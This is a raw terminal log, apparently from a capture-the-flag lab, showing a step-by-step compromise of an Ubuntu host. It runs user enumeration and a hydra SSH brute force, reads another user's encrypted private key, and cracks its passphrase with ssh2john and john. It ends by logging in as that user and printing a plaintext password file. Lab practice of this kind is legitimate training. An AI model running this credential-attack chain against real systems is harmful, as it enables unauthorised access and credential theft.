S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-22-1-1002 Unix User\ubuntu (Local User)
=============================================
| Getting printer info for 10.10.115.56 |
=============================================
No printers returned.
enum4linux complete on Fri Oct 10 17:52:25 2025
root@ip-10-10-91-159:~# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.115.56
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-10 17:55:01
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]
Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
Example: hydra -l user -P passlist.txt ftp://192.168.0.1
root@ip-10-10-91-159:~# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.115.56 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-10 17:55:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.115.56:22/
[STATUS] 163.00 tries/min, 163 tries in 00:01h, 14344239 to do in 1466:42h, 16 active
[STATUS] 113.33 tries/min, 340 tries in 00:03h, 14344062 to do in 2109:26h, 16 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
root@ip-10-10-91-159:~# ssh jan@10.10.115.56
The authenticity of host '10.10.115.56 (10.10.115.56)' can't be established.
ECDSA key fingerprint is SHA256:+sOi3lwJs5CmmXNN38BxmKzbEJySyCbGqjetaazoEsI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.115.56' (ECDSA) to the list of known hosts.
jan@10.10.115.56's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri 10 Oct 2025 01:13:49 PM EDT
System load: 0.0 Processes: 107
Usage of /: 49.8% of 13.62GB Users logged in: 0
Memory usage: 48% IPv4 address for eth0: 10.10.115.56
Swap usage: 0%
Expanded Security Maintenance for Infrastructure is not enabled.
0 updates can be applied immediately.
Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Hardware Enablement Stack (HWE) is supported until April 2025.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@ip-10-10-115-56:~$ ls
jan@ip-10-10-115-56:~$ cd /home
jan@ip-10-10-115-56:/home$ la
la: command not found
jan@ip-10-10-115-56:/home$ ls
jan kay ubuntu
jan@ip-10-10-115-56:/home$ sudo su kay
[sudo] password for jan:
jan is not in the sudoers file. This incident will be reported.
jan@ip-10-10-115-56:/home$ ls
jan kay ubuntu
jan@ip-10-10-115-56:/home$ cd kay
jan@ip-10-10-115-56:/home/kay$ ls -a
. .bash_logout .lesshst .profile .viminfo
.. .bashrc .nano .ssh
.bash_history .cache pass.bak .sudo_as_admin_successful
jan@ip-10-10-115-56:/home/kay$ cat .sudo_as_admin_successful
jan@ip-10-10-115-56:/home/kay$ sudo cat .sudo_as_admin_successful
[sudo] password for jan:
jan is not in the sudoers file. This incident will be reported.
jan@ip-10-10-115-56:/home/kay$ ssh kay@10.10.115.56
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.115.56 (10.10.115.56)' can't be established.
ECDSA key fingerprint is SHA256:+sOi3lwJs5CmmXNN38BxmKzbEJySyCbGqjetaazoEsI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
kay@10.10.115.56's password:
Permission denied, please try again.
kay@10.10.115.56's password:
jan@ip-10-10-115-56:/home/kay$ ls
pass.bak
jan@ip-10-10-115-56:/home/kay$ ls -a
. .bash_logout .lesshst .profile .viminfo
.. .bashrc .nano .ssh
.bash_history .cache pass.bak .sudo_as_admin_successful
jan@ip-10-10-115-56:/home/kay$ cd .ssh
jan@ip-10-10-115-56:/home/kay/.ssh$ ll
ll: command not found
jan@ip-10-10-115-56:/home/kay/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
jan@ip-10-10-115-56:/home/kay/.ssh$ ssh -i authorized_keys kay@10.10.115.56
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.115.56 (10.10.115.56)' can't be established.
ECDSA key fingerprint is SHA256:+sOi3lwJs5CmmXNN38BxmKzbEJySyCbGqjetaazoEsI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Load key "authorized_keys": invalid format
kay@10.10.115.56's password:
jan@ip-10-10-115-56:/home/kay/.ssh$ ssh -i "authorized_keys" kay@10.10.115.56
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.115.56 (10.10.115.56)' can't be established.
ECDSA key fingerprint is SHA256:+sOi3lwJs5CmmXNN38BxmKzbEJySyCbGqjetaazoEsI.
Are you sure you want to continue connecting (yes/no/[fingerprint])?
Host key verification failed.
jan@ip-10-10-115-56:/home/kay/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
jan@ip-10-10-115-56:/home/kay/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
jan@ip-10-10-115-56:/home/kay/.ssh$ cat authorized_keys
ssh-rsa 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 I don't have to type a long password anymore!
jan@ip-10-10-115-56:/home/kay/.ssh$ exit
logout
Connection to 10.10.115.56 closed.
root@ip-10-10-91-159:~# touch ssh_ket.pem
root@ip-10-10-91-159:~# ls
burp.json Downloads Pictures Scripts staff.txt
CTFBuilder hydra.restore Postman snap thinclient_drives
Desktop Instructions Rooms ssh_ket.pem Tools
root@ip-10-10-91-159:~# vi ssh_ket.pem
root@ip-10-10-91-159:~# ls -l
total 150732
-rw-r--r-- 1 root root 13154 May 6 2024 burp.json
drwxr-xr-x 2 root root 4096 May 6 2024 CTFBuilder
drwxr-xr-x 4 root root 4096 May 23 09:44 Desktop
drwxr-xr-x 2 root root 4096 Nov 19 2024 Downloads
-rw-r--r-- 1 root root 154275923 Oct 10 18:01 hydra.restore
drwxr-xr-x 2 root root 4096 May 7 2024 Instructions
drwxr-xr-x 3 root root 4096 May 16 12:28 Pictures
drwxr-xr-x 3 root root 4096 Aug 16 2020 Postman
drwxr-xr-x 41 root root 4096 May 23 09:40 Rooms
drwxr-xr-x 2 root root 4096 Oct 10 09:10 Scripts
drwx------ 5 root root 4096 May 16 12:34 snap
-rw-r--r-- 1 root root 772 Oct 10 18:25 ssh_ket.pem
-rw-r--r-- 1 root root 173 Oct 10 17:49 staff.txt
drwxr-xr-t 2 root root 4096 Aug 13 2020 thinclient_drives
lrwxrwxrwx 1 root root 19 Mar 18 2021 Tools -> /root/Desktop/Tools
root@ip-10-10-91-159:~# chmod 600 ssh_ket.pem
root@ip-10-10-91-159:~# ls -l
total 150732
-rw-r--r-- 1 root root 13154 May 6 2024 burp.json
drwxr-xr-x 2 root root 4096 May 6 2024 CTFBuilder
drwxr-xr-x 4 root root 4096 May 23 09:44 Desktop
drwxr-xr-x 2 root root 4096 Nov 19 2024 Downloads
-rw-r--r-- 1 root root 154275923 Oct 10 18:01 hydra.restore
drwxr-xr-x 2 root root 4096 May 7 2024 Instructions
drwxr-xr-x 3 root root 4096 May 16 12:28 Pictures
drwxr-xr-x 3 root root 4096 Aug 16 2020 Postman
drwxr-xr-x 41 root root 4096 May 23 09:40 Rooms
drwxr-xr-x 2 root root 4096 Oct 10 09:10 Scripts
drwx------ 5 root root 4096 May 16 12:34 snap
-rw------- 1 root root 772 Oct 10 18:25 ssh_ket.pem
-rw-r--r-- 1 root root 173 Oct 10 17:49 staff.txt
drwxr-xr-t 2 root root 4096 Aug 13 2020 thinclient_drives
lrwxrwxrwx 1 root root 19 Mar 18 2021 Tools -> /root/Desktop/Tools
root@ip-10-10-91-159:~# ssh -i ssh_ket.pem kay@10.10.115.56
Load key "ssh_ket.pem": invalid format
kay@10.10.115.56's password:
root@ip-10-10-91-159:~# ssh jan@10.10.115.56
jan@10.10.115.56's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri 10 Oct 2025 01:27:28 PM EDT
System load: 0.0 Processes: 107
Usage of /: 49.8% of 13.62GB Users logged in: 0
Memory usage: 47% IPv4 address for eth0: 10.10.115.56
Swap usage: 0%
Expanded Security Maintenance for Infrastructure is not enabled.
0 updates can be applied immediately.
Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Oct 10 13:13:51 2025 from 10.10.91.159
jan@ip-10-10-115-56:~$ ls -l
total 0
jan@ip-10-10-115-56:~$ cd /home
jan@ip-10-10-115-56:/home$ ll
ll: command not found
jan@ip-10-10-115-56:/home$ cd kay/
jan@ip-10-10-115-56:/home/kay$ ls -a
. .bash_logout .lesshst .profile .viminfo
.. .bashrc .nano .ssh
.bash_history .cache pass.bak .sudo_as_admin_successful
jan@ip-10-10-115-56:/home/kay$ cd .ssh/
jan@ip-10-10-115-56:/home/kay/.ssh$ ls -l
total 12
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
jan@ip-10-10-115-56:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
-----END RSA PRIVATE KEY-----
jan@ip-10-10-115-56:/home/kay/.ssh$ exit
logout
Connection to 10.10.115.56 closed.
root@ip-10-10-91-159:~# ls
burp.json Downloads Pictures Scripts staff.txt
CTFBuilder hydra.restore Postman snap thinclient_drives
Desktop Instructions Rooms ssh_ket.pem Tools
root@ip-10-10-91-159:~# vi s
snap/ ssh_ket.pem staff.txt
root@ip-10-10-91-159:~# vi ssh_ket.pem
root@ip-10-10-91-159:~# ssh -i ssh_ket.pem kay@10.10.115.56
Enter passphrase for key 'ssh_ket.pem':
kay@10.10.115.56's password:
Permission denied, please try again.
kay@10.10.115.56's password:
Permission denied, please try again.
kay@10.10.115.56's password:
Connection closed by 10.10.115.56 port 22
root@ip-10-10-91-159:~# python ssh2john.py ssh_ket.pem > id_rsa_conv
root@ip-10-10-91-159:~# ls -l
total 150752
-rw-r--r-- 1 root root 13154 May 6 2024 burp.json
drwxr-xr-x 2 root root 4096 May 6 2024 CTFBuilder
drwxr-xr-x 4 root root 4096 May 23 09:44 Desktop
drwxr-xr-x 2 root root 4096 Nov 19 2024 Downloads
-rw-r--r-- 1 root root 154275923 Oct 10 18:01 hydra.restore
-rw-r--r-- 1 root root 4767 Oct 10 18:34 id_rsa_conv
drwxr-xr-x 2 root root 4096 May 7 2024 Instructions
drwxr-xr-x 3 root root 4096 May 16 12:28 Pictures
drwxr-xr-x 3 root root 4096 Aug 16 2020 Postman
drwxr-xr-x 41 root root 4096 May 23 09:40 Rooms
drwxr-xr-x 2 root root 4096 Oct 10 09:10 Scripts
drwx------ 5 root root 4096 May 16 12:34 snap
-rwxr-xr-x 1 root root 8696 Sep 2 2020 ssh2john.py
-rw------- 1 root root 3327 Oct 10 18:29 ssh_ket.pem
-rw-r--r-- 1 root root 173 Oct 10 17:49 staff.txt
drwxr-xr-t 2 root root 4096 Aug 13 2020 thinclient_drives
lrwxrwxrwx 1 root root 19 Mar 18 2021 Tools -> /root/Desktop/Tools
root@ip-10-10-91-159:~# john id_rsa_conv --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (ssh_ket.pem)
1g 0:00:00:08 DONE (2025-10-10 18:39) 0.1243g/s 1783Kp/s 1783Kc/s 1783KC/s *7¡Vamos!
Session completed.
root@ip-10-10-91-159:~# ssh -i ssh_ket.pem kay@10.10.115.56
Enter passphrase for key 'ssh_ket.pem':
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri 10 Oct 2025 01:40:49 PM EDT
System load: 0.0 Processes: 107
Usage of /: 49.9% of 13.62GB Users logged in: 0
Memory usage: 47% IPv4 address for eth0: 10.10.115.56
Swap usage: 0%
Expanded Security Maintenance for Infrastructure is not enabled.
0 updates can be applied immediately.
Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Sun Jun 22 13:40:04 2025 from 10.23.8.228
kay@ip-10-10-115-56:~$ cd ~
kay@ip-10-10-115-56:~$ ls -a
. .bash_history .bashrc .lesshst pass.bak .ssh .viminfo
.. .bash_logout .cache .nano .profile .sudo_as_admin_successful
kay@ip-10-10-115-56:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@ip-10-10-115-56:~$